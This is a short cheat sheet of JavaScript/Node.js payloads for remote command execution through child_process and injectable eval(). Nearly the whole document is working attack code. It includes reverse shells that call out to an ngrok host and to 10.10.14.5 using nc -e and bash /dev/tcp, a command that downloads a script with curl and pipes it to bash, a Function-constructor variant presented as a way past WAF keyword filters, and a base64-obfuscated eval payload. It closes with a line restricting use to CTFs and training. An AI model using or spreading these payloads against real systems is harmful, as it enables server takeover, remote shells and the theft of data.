Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection.


📄 Basic Reverse Shell using child_process.exec()

require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh')

📌 Listener on attacker side:

nc -lvnp 18402

📄 Spawn a shell via spawn() method

require('child_process').spawn('/bin/sh', [])

This spawns an interactive shell on the server if injected.


📄 Execute a simple Linux command

require('child_process').exec('ls -la', function(error, stdout, stderr) {
    console.log(stdout)
})

📄 Download and execute a script (e.g., reverse shell script)

require('child_process').exec('curl http://10.10.14.5/rev.sh | bash')

📄 Reverse shell using bash and TCP

require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1')

💡 Use this when nc -e is restricted or not available.


📄 Eval payload to run commands (if input is eval’d)

eval("require('child_process').exec('id')")

📄 Using Function constructor for cleaner payload

Function("return process")().mainModule.require('child_process').exec('nc 10.10.14.5 4444 -e /bin/bash')

🔒 Bypasses some WAF or keyword-based filters.


📄 Obfuscated reverse shell payload (base64 encoded)

eval(Buffer.from("cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ25jIDEwLjEwLjE0LjUgNDQ0NCAtZSAvYmluL2Jhc2gnKQ==", 'base64').toString())

✅ Decode with:

echo 'cmVx...==' | base64 -d

🧪 Useful Checks

✅ Check if you’re in a Node.js environment

typeof process !== 'undefined'

✅ Check for command execution support

typeof require('child_process').exec === 'function'

🎯 Tips for Exploitation

  • Use ngrok, serveo, or local port forwarding if public IP is not accessible.
  • Replace nc with wget, curl, or bash depending on what’s installed.
  • Always test in a safe lab environment.

⚠️ Always get proper authorization before using these techniques. Intended for ethical hacking, CTFs, and training only.